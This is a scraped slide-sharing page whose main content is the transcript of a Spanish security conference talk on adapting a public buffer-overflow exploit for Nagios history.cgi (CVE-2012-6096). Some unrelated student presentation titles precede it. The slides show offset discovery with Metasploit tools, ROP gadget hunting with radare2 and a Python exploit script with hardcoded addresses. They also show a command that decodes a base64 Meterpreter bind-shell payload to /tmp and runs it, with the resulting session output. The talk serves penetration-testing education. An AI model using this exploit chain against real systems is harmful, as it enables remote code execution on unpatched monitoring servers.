Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativa
 
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOAREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptx
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptx
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 

Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite Valencia]

  • 1. ‹#› ADAPTANDO EXPLOITS PARA EVITAR LA FRUSTRACIÓN Satellite Edition Rooted Satellite Valencia
  • 2. ‹#› Rooted Satellite Valencia $ whois jselvi Jose Selvi +10 años trabajando en seguridad Principal Penetration Tester & Forensics Analyst SANS Institute Community Instructor GIAC Security Expert (GSE) Twitter: @JoseSelvi Blog: http://www.pentester.es
  • 3. ‹#› “Hola Mundo” de público ¿Quién de vosotros ha tocado alguna vez un ordenador? Sí, con Windows también vale… Rooted Satellite Valencia
  • 4. ‹#› Lo más frustrante del mundo Rooted Satellite Valencia
  • 5. ‹#› Algo casi tan frustrante… El sistema, según su versión, ES vulnerable. Sabemos que no está “backported”. Sin embargo, el exploit no funciona… Rooted Satellite Valencia
  • 6. ‹#› ¡Vamos a ello! Pentesting & Exploiting Vulnerabilidad CVE-2012-6096 Exploit público Cómo depurar un CGI Sobreescribiendo la “Return Address” Construyendo un nuevo ROP Exploit funcional Rooted Satellite Valencia
  • 7. ‹#› Exploiting en el Pentesting Rooted Satellite Valencia Exploiting Script Kiddie Pentester Pentester++ Security Researcher
  • 8. ‹#› ¡Vamos a ello! Pentesting & Exploiting Vulnerabilidad CVE-2012-6096 Exploit público Cómo depurar un CGI Sobreescribiendo la “Return Address” Construyendo un nuevo ROP. Exploit funcional. Rooted Satellite Valencia
  • 9. ‹#› La vulnerabilidad Publicada en: http://list.grok.org.uk/pipemail/full-disclosure/ 2012-December/089125.html “history.cgi is vulnerable to a buffer overflow due to the use of sprintf with user supplied data that has not been restricted in size. This vulnerability does not appear to be exploitable on the majority of systems (due to stack cookies, the NX bit, etc).” http://server/nagios/cgi-bin/ history.cgi?host=AAAAAAAAAAAAAAAAA Rooted Satellite Valencia AAAAAA…
  • 10. ‹#› ¡Vamos a ello! Pentesting & Exploiting Vulnerabilidad CVE-2012-6096 Exploit público Cómo depurar un CGI Sobreescribiendo la “Return Address” Construyendo un nuevo ROP Exploit funcional Rooted Satellite Valencia
  • 11. ‹#› El exploit público Programado por @bl4sty: https://twitter.com/bl4sty Colgado en Pastebin: http://pastebin.com/FJUNyTaj Rooted Satellite Valencia
  • 12. ‹#› Buffer Overflow Rooted Satellite Valencia
  • 13. ‹#› Buffer Overflow CMD: Comando a ejecutar A’s: Suficientes para sobreescribir “Return Address” ROP: Para ejecutar el CMD Rooted Satellite Valencia
  • 14. ‹#› Creando el CMD echo BASE64ENCODE | base64 -d | tee /tmp/x chmod +x /tmp/x ; /tmp/x sed ’s/ /${IFS}/g’ Rooted Satellite Valencia
  • 15. ‹#› Rooted Satellite Valencia Shellcode
  • 16. ‹#› Buffer Overflow CMD: Comando a ejecutar A’s: Suficientes para sobreescribir “Return Address” ROP: Para ejecutar el CMD Rooted Satellite Valencia
  • 17. ‹#› ¿Qué es ROP? Rooted Satellite Valencia Return Oriented Programming (ROP). Evolución / inspirado en return-to-libc. Usado para evitar la protección de pila no ejecutable (NX).
  • 18. ‹#› Rooted Satellite Valencia ¿Qué es NX? Si nuestro shellcode se encuentra en una página no ejecutable, no podemos saltar a él. Non-eXecution Bit. Marca páginas de la memoria como no ejecutables.
  • 19. ‹#› ROP en nuestro exploit Rooted Satellite Valencia
  • 20. ‹#› ¿Qué es ASLR? Rooted Satellite Valencia Address Space Layer Randomization. Las librerías se cargan en zonas de memoria “aleatorias”. Dificultan encontrar “gadgets” para formar un ROP. system() int system() { […] } AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA
  • 21. ‹#› Evadiendo NX y ASLR En ocasiones alguna librería u otro elemento presente en la memoria no se encuentra compilado con soporte para ASLR y puede permitirnos utilizarlo para buscar gadgets. El propio cuerpo del binario puede no estar compilado con PIE (Process Independent Execution), con lo que su posición en memoria será siempre la misma. En este caso, los CGI de Nagios no se encuentran compilados de esta forma, por lo que vamos a poder utilizarlos. Rooted Satellite Valencia
  • 22. ‹#› ¿Qué es PLT / GOT? Rooted Satellite Valencia Procedure Linkage Table (PLT). Global Offset Table (GOT). Sin PIE, expone algunas funciones en direcciones estáticas.
  • 23. ‹#› Nuestro ROP en acción Rooted Satellite Valencia unescape() 0x popret var hostbuf system( ) 0xdeafbabe var hostbuf unescape(hostbuf) system(hostbuf) 0xdeafbabe()
  • 24. ‹#› Lanzando el exploit Rooted Satellite Valencia
  • 25. ‹#› ¿Por qué no funciona? La compilación del binario puede ser diferente y por lo tanto las posiciones de memoria que hemos utilizado para el ROP y la separación entre el Buffer y la “Return Address” puede ser diferentes. Necesitamos analizar el binario del nuevo sistema para poder localizar los gadgets adecuados y poder adaptar el exploit a esta nuevo objetivo. Rooted Satellite Valencia
  • 26. ‹#› ¡Vamos a ello! Pentesting & Exploiting Vulnerabilidad CVE-2012-6096 Exploit público Cómo depurar un CGI Sobreescribiendo la “Return Address” Construyendo un nuevo ROP Exploit funcional Rooted Satellite Valencia
  • 27. I'm guessing you're trying to execute the CGI from a command line. In order to do that, you need to set the REQUEST_METHOD environment variable to either "GET", "HEAD", or "POST". When using the GET and HEAD methods, arguments can be passed to the CGI by setting the "QUERY_STRING" environment variable. If you’re using the POST method, data is read from standard input. Also of note: if you've enabled authentication in the CGIs, you must set the “REMOTE_USER" environment variable to be the name of the user you’re "authenticated" as. ‹#› (no) Depurando un CGI $ /usr/local/nagios/sbin/history.cgi getcgivars(): Unsupported REQUEST_METHOD -> '' Rooted Satellite Valencia
  • 28. ‹#› ¿Cómo funciona un CGI? CLIENT APACHE CGI Request Response Rooted Satellite Valencia Run CGI Pass CGI Env Response
  • 29. ‹#› Depurando un CGI $ export REMOTE_USER='nagiosadmin' $ export REQUEST_METHOD='GET' $ export QUERY_STRING="host=foo" $ /usr/local/nagios/sbin/history.cgi Cache-Control: no-store Pragma: no-cache Last-Modified: Mon, 20 Jan 2014 19:16:51 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-type: text/html <html> <head><title>CGI TEST</title></head> <body> HELLO WORLD! </body> </html> Rooted Satellite Valencia
  • 30. ‹#› ¡Vamos a ello! Pentesting & Exploiting Vulnerabilidad CVE-2012-6096 Exploit público Cómo depurar un CGI Sobreescribiendo la “Return Address” Construyendo un nuevo ROP Exploit funcional Rooted Satellite Valencia
  • 31. ‹#› Elige tus armas… RADARE Rooted Satellite Valencia
  • 32. ‹#› Radare2: Try it, Love it, … La próxima vez que de esta u otra charla similar, será usando 100% Radare2. Increiblemente potente. Tecnología Barcelonesa. https://github.com/radare/radare2 http://radare.today Siguelos en Twitter @radareorg Rooted Satellite Valencia
  • 33. ‹#› Controlando el EIP $ /opt/msf4/tools/pattern_create.rb 4000 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa[…]Fc8Fc9Fd0Fd1Fd2F $ export REMOTE_USER=‘nagiosadmin' $ export REQUEST_METHOD=‘GET' $ export QUERY_STRING="host=`pattern_create.rb 4000`” $ gdb /usr/local/nagios/sbin/history.cgi (gdb) run Starting program: /usr/local/nagios/sbin/history.cgi Program received signal SIGSEGV, Segmentation fault. 0x61453661 in ?? () 0x61 (a) 0x36 (6) 0x45 (E) 0x61 (a) $ /opt/msf4/tools/pattern_offset.rb a6Ea 4000 [*] Exact match at offset 3139 Rooted Satellite Valencia
  • 34. ‹#› -D_FORTIFY_SOURCE=2 $ export REMOTE_USER=‘nagiosadmin' $ export REQUEST_METHOD=‘GET' $ export QUERY_STRING="host=`python -c "print 'A'*4000"`” $ ./history-fortify.cgi *** buffer overflow detected ***: ./history-fortify.cgi ======= Backtrace: ========= /lib/libc.so.6(__fortify_fail+0x4d)[0x4e57ad] /lib/libc.so.6(+0xfa7ea)[0x4e37ea] /lib/libc.so.6(+0xf9f18)[0x4e2f18] /lib/libc.so.6(_IO_default_xsputn+0x13c)[0x457f4c] /lib/libc.so.6(_IO_vfprintf+0x4048)[0x42daa8] /lib/libc.so.6(__vsprintf_chk+0xa7)[0x4e2fc7] /lib/libc.so.6(__sprintf_chk+0x2d)[0x4e2f0d] ./history-fortify.cgi[0x804a177] ./history-fortify.cgi[0x804ae44] /lib/libc.so.6(__libc_start_main+0xe6)[0x3ffce6] ./history-fortify.cgi[0x8048fc1] ======= Memory map: ======== […] Rooted Satellite Valencia
  • 35. ‹#› Rooted Satellite Valencia Stack Canary Protección contra desbordamientos de buffer. Añadida en tiempo de compilación si se emplean las opciones oportunas. Valor aleatorio situado en la pila, antes del EIP. Se comprueba su integridad.
  • 36. ‹#› Canary en CGI Rooted Satellite Valencia $ ./canary.bin Canary(0): 0xbfa3ce10 Canary(1): 0xbfa3ce10 Canary(2): 0xbfa3ce10 […] $ ./canary.bin Canary(0): 0xbfcfbcb0 Canary(1): 0xbfcfbcb0 Canary(2): 0xbfcfbcb0 […]
  • 37. ‹#› DEMO Rooted Satellite Valencia
  • 38. ‹#› ¡Vamos a ello! Pentesting & Exploiting Vulnerabilidad CVE-2012-6096 Exploit público Cómo depurar un CGI Sobreescribiendo la “Return Address” Construyendo un nuevo ROP Exploit funcional Rooted Satellite Valencia
  • 39. $ rabin2 -i history.cgi [Imports] […] addr=0x08048bb0 off=0x00000bb0 ordinal=016 hint=000 bind=GLOBAL type=FUNC name=system […] addr=0x08048e70 off=0x00000e70 ordinal=060 hint=000 bind=GLOBAL type=FUNC name=exit 60 imports ‹#› Buscando system/exit PLT Rooted Satellite Valencia unescape() 0x popret var hostbuf system( ) exit( ) var hostbuf
  • 40. ‹#› Buscando Pop-Ret Rooted Satellite Valencia unescape() 0x popret var hostbuf system( ) exit( ) var hostbuf $ /opt/msf4/msfelfscan -p history.cgi 0x08048f03 pop ebx; pop ebp; ret 0x0804936b pop edi; pop ebp; ret 0x08049ca6 pop edi; pop ebp; ret 0x0804a6d4 pop edi; pop ebp; ret […] $ rasm2 -a x86 -b 32 'pop ebx' 5b
  • 41. ‹#› Buscando HostBuffer Rooted Satellite Valencia unescape() 0x popret var hostbuf system( ) exit( ) var hostbuf $ export REMOTE_USER=‘nagiosadmin' $ export REQUEST_METHOD='GET' $ export QUERY_STRING="host=`python -c "print ‘A'*4000"`" $ r2 -d history.cgi Process with PID 9270 started… [0x00214850]> dc [R2] Breakpoint recoil at 0x41414141 = 0 [0x41414140]> s 0 [0x00000000]> /x 414141414141414141414141 hits: 400 0x08079b60 hit0_0 414141414141414141414141 […]
  • 42. ‹#› Buscando Unescape Rooted Satellite Valencia unescape() 0x popret var hostbuf system( ) exit( ) var hostbuf
  • 43. ‹#› DEMO Rooted Satellite Valencia
  • 44. ‹#› ¡Vamos a ello! Pentesting & Exploiting Vulnerabilidad CVE-2012-6096 Exploit público Cómo depurar un CGI Sobreescribiendo la “Return Address” Construyendo un nuevo ROP Exploit funcional Rooted Satellite Valencia
  • 45. ‹#› Ejecutando un Ping #!/usr/bin/python stackspace=0xc43 cmd="ping -c5 127.0.0.1;" cmd = cmd.replace(" ", “${IFS}") unescape_addr='x60xc2x04x08' # 0x0804c260 popret_addr='x04x8fx04x08' # 0x08048f04 hostbuf_addr='x60x9bx07x08' # 0x08079b60 system_plt_addr='xb0x8bx04x08' # 0x08048bb0 exit_addr='x70x8ex04x08' # 0x08048e70 rop_chain = unescape_addr+popret_addr+hostbuf_addr+system_plt_addr+exit_a ddr+hostbuf_addr stackspace=stackspace-len(cmd) exploit=cmd+'A'*stackspace+rop_chain $ export QUERY_STRING="host=`python exploit.py`" Rooted Satellite Valencia
  • 46. ‹#› DEMO Rooted Satellite Valencia
  • 47. ‹#› Ejecutando Shell $ msfpayload linux/x86/meterpreter/bind_tcp RHOST=127.0.0.1 X | base64 #!/usr/bin/python # Meterpreter Linux x86 BindTcp 4444 msf_payload=“f0VMRgEBAQAAAAAAAAAAAAI[…]Aid//4Q==“ cmd="echo "+msf_payload+"|base64 -d|tee /tmp/aaa;chmod +x /tmp/aaa;/tmp/aaa;" cmd = cmd.replace(" ", “${IFS}") […] msf> use exploit/multi/handler msf> set PAYLOAD linux/x86/meterpreter/bind_tcp msf> set RHOST 127.0.0.1 msf> exploit [*] Meterpreter session 1 opened (127.0.0.1:56602 -> 127.0.0.1:4444) at 2014-01-20 20:38:50 +0000 meterpreter> Rooted Satellite Valencia
  • 48. ‹#› Explotación en remoto Rooted Satellite Valencia
  • 49. ‹#› DEMO Rooted Satellite Valencia
  • 50. ‹#› Jose Selvi http://twitter.com/JoseSelvi Rooted Satellite Valencia jselvi@pentester.es http://www.pentester.es jselvi@incide.es http://www.incide.es